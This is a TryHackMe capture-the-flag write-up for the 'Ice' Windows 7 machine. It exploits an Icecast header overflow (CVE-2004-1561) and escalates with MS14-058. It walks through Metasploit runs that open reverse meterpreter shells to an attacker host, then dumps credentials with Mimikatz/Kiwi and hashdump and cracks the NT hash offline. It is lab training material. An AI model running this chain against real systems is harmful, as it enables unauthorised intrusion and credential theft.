← back to writeups
platform TryHackMe
difficulty Easy

---

Ice is an Easy Windows machine running Icecast, an open-source streaming media server. Versions before 2.0.2 contain a buffer overflow in HTTP header handling (CVE-2004-1561) that gives unauthenticated remote code execution. After landing a low-privilege shell, privilege escalation goes through a kernel exploit in win32k.sys (MS14-058) that bypasses UAC entirely and delivers a SYSTEM shell. From there, Mimikatz (via Kiwi) recovers plaintext credentials directly from memory.

Verkenning

A full port scan first — before running -sC -sV against all 65535 ports. This avoids missing high-numbered services while keeping the version scan fast by running it only against confirmed open ports.

kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ nmap -p- -T4 --min-rate 1000 --open --max-retries 2 $TARGET_IP

Starting Nmap 7.99 ( https://nmap.org ) at 2026-09-13 11:19 +0200
Nmap scan report for $TARGET_IP
Host is up (0.019s latency).
Not shown: 61592 closed tcp ports (reset), 3933 filtered tcp ports (no-response)

PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5357/tcp  open  wsdapi
8000/tcp  open  http-alt
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49160/tcp open  unknown
49184/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 13.55 seconds

Port 8000 stands out — that is the default port for Icecast. The high ports above 49000 are standard Windows ephemeral RPC. Version scan against the relevant ports:

kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -p 135,139,445,5357,8000 $TARGET_IP

Starting Nmap 7.99 ( https://nmap.org ) at 2026-09-13 11:21 +0200
Nmap scan report for $TARGET_IP
Host is up (0.019s latency).

PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
5357/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
8000/tcp open  http         Icecast streaming media server
|_http-title: Site doesn't have a title (text/html).
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   2.1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2026-09-13T09:21:32
|_  start_date: 2026-09-13T09:19:04
|_nbstat: NetBIOS name: DARK-PC, NetBIOS user: <unknown>, NetBIOS MAC: 0a:ff:cc:0f:78:a1 (unknown)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   Computer name: Dark-PC
|   NetBIOS computer name: DARK-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2026-09-13T04:21:32-05:00

Nmap done: 1 IP address (1 host up) scanned in 17.74 seconds

The scan confirms Windows 7 Professional SP1 (build 7601) and Icecast on port 8000. The hostname DARK-PC directly reveals the local username: Dark. SMB message signing is disabled — the default on Windows 7 — but SMB is not the attack surface here. Icecast versions before 2.0.2 are vulnerable to CVE-2004-1561: a fixed-size stack buffer overflows when a request contains exactly 32 HTTP headers, overwriting the return address. No authentication required.

Initiële toegang — Icecast Header Overflow (CVE-2004-1561)

Metasploit includes a stable module for this vulnerability. The default payload is x86, which is appropriate because Icecast2.exe is a 32-bit process even on a 64-bit OS.

kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ msfconsole -q

msf > use exploit/windows/http/icecast_header
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf exploit(windows/http/icecast_header) > set RHOSTS $TARGET_IP
RHOSTS => $TARGET_IP
msf exploit(windows/http/icecast_header) > set LHOST $ATTACKER_IP
LHOST => $ATTACKER_IP
msf exploit(windows/http/icecast_header) > run

[*] Started reverse TCP handler on $ATTACKER_IP:4444
[*] Sending stage (203455 bytes) to $TARGET_IP
[*] Meterpreter session 1 opened ($ATTACKER_IP:4444 -> $TARGET_IP:49222) at 2026-09-13 11:32:28 +0200

meterpreter > getuid
Server username: Dark-PC\Dark

meterpreter > sysinfo
Computer        : DARK-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

Shell landed as Dark-PC\Dark — a regular user. The OS is x64 but Meterpreter is x86 because it injected into the 32-bit Icecast process. Local exploit modules check the session architecture and abort when there is a mismatch. Migrate to a native x64 process first:

meterpreter > ps

 PID   PPID  Name          Arch  Session  User          Path
 ---   ----  ----          ----  -------  ----          ----
 1300  1020  dwm.exe       x64   1        Dark-PC\Dark  C:\Windows\System32\dwm.exe
 1320  692   explorer.exe  x64   1        Dark-PC\Dark  C:\Windows\explorer.exe
 1488  692   taskhost.exe  x64   1        Dark-PC\Dark  C:\Windows\System32\taskhost.exe
 1996  1320  Icecast2.exe  x86   1        Dark-PC\Dark  C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe

meterpreter > migrate 1488
[*] Migrating from 1996 to 1488...
[*] Migration completed successfully.

meterpreter > sysinfo
Architecture    : x64
Meterpreter     : x64/windows

Privilege-escalatie — MS14-058 TrackPopupMenu (CVE-2014-4113)

getsystem fails — UAC is active and blocks the standard named pipe and token duplication techniques. The local exploit suggester enumerates viable paths:

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.129.146.96 - Collecting local exploits for x64/windows...
[+] exploit/windows/local/bypassuac_comhijack: The target appears to be vulnerable.
[+] exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] exploit/windows/local/cve_2019_1458_wizardopium: The target appears to be vulnerable.
[+] exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.

MS14-058 exploits a use-after-free in win32k.sys — a kernel-level vulnerability that runs at ring 0, completely bypassing UAC without needing an elevated process to start from. Set both target and payload to x64 to match the session:

msf > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(windows/local/ms14_058_track_popup_menu) > set SESSION 1
SESSION => 1
msf exploit(windows/local/ms14_058_track_popup_menu) > set LHOST $ATTACKER_IP
LHOST => $ATTACKER_IP
msf exploit(windows/local/ms14_058_track_popup_menu) > set target 1
target => 1
msf exploit(windows/local/ms14_058_track_popup_menu) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/ms14_058_track_popup_menu) > run

[*] Started reverse TCP handler on $ATTACKER_IP:4444
[*] Reflectively injecting the exploit DLL and triggering the exploit...
[*] Launching netsh to host the DLL...
[+] Process 3516 launched.
[*] Reflectively injecting the DLL into 3516...
[*] Sending stage (255679 bytes) to $TARGET_IP
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened ($ATTACKER_IP:4444 -> $TARGET_IP:49240) at 2026-09-13 11:45:03 +0200

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > getsystem
[-] Already running as SYSTEM

Full SYSTEM access. Migrate into spoolsv.exe to interact with lsass — the printer spool service runs as SYSTEM, is x64, and restarts automatically if it crashes:

meterpreter > migrate -N spoolsv.exe
[*] Migrating from 3516 to 1396...
[*] Migration completed successfully.

Post-exploitatie — Credential Dumping

Load Kiwi (Metasploit's Mimikatz integration) to pull credentials directly from memory. This works even without the user actively logged in because Icecast runs as a scheduled task under the Dark account, keeping credentials cached in lsass:

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials

msv credentials
===============
Username  Domain   NTLM                              SHA1
--------  ------   ----                              ----
Dark      Dark-PC  7c4fe5eada682714a036e39378362bab  0d082c4b4f2aeafb67fd0ea568a997e9d3ebc0eb

wdigest credentials
===================
Username  Domain     Password
--------  ------     --------
Dark      Dark-PC    Password01!

tspkg credentials
=================
Username  Domain   Password
--------  ------   --------
Dark      Dark-PC  Password01!

kerberos credentials
====================
Username  Domain   Password
--------  ------   --------
Dark      Dark-PC  Password01!

Dark's plaintext password: Password01!. Confirmed with hashdump:

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Dark:1000:aad3b435b51404eeaad3b435b51404ee:7c4fe5eada682714a036e39378362bab:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Crack Dark's NT hash offline to verify:

kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ echo "7c4fe5eada682714a036e39378362bab" > dark_hash.txt
┌──(kali㉿kali)-[~]
└─$ john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt dark_hash.txt

Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 128/128 SSE2 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
Password01!      (?)
1g 0:00:00:00 DONE (2026-09-13 11:51) 2.702g/s 5684Kp/s 5684Kc/s

Kernlessen

  • Icecast versions before 2.0.2 on Windows are vulnerable to CVE-2004-1561 — a header overflow triggered by exactly 32 HTTP headers, no credentials required. Always check port 8000 when enumerating Windows targets.
  • When Meterpreter is x86 on an x64 OS (because it injected into a 32-bit process), migrate to a native x64 process before running local exploits — the architecture mismatch silently aborts modules that would otherwise work.
  • MS14-058 operates at the kernel level (win32k.sys) and bypasses UAC entirely. Unlike UAC-bypass techniques, it does not need to start from an elevated process. Always explicitly set target and payload to match the session architecture when using local exploits.
  • Password01! passes naive complexity checks but appears in every major wordlist. Complexity rules without minimum length and uniqueness requirements produce predictable patterns.
  • With a SYSTEM shell and Kiwi loaded, creds_all recovers plaintext passwords from lsass memory — even for accounts that are not actively logged in, as long as a service is running under that account.

Referenties